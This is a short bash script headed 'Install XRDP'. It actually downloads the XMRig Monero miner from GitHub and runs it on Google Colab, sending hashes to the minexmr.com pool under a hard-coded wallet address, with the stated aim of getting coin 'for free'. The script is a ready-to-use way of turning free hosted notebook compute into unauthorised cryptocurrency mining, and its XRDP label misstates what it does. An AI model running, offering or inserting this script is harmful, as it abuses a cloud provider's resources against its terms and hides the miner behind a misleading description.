#! /bin/bash
# Install XRDP
# Before get xmr coin for free
# Google Colab
sudo apt update
clear
sudo apt install screen
screen -R xmr
 
wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-bionic-x64.tar.gz
tar xvzf xmrig-6.16.4-bionic-x64.tar.gz
cd xmrig-6.16.4
./xmrig -o us-west.minexmr.com:443 -u 842wr7CPzeE4pGshnJdZNW5P5xPL5TuSYUWNnJ6KH5NzDHWFHLmN7Hcd3fXmKMvFZn4sZGPMbNMLsaSnaNA7ZFS99Vezyqw -k --tls --rig-id GC-US
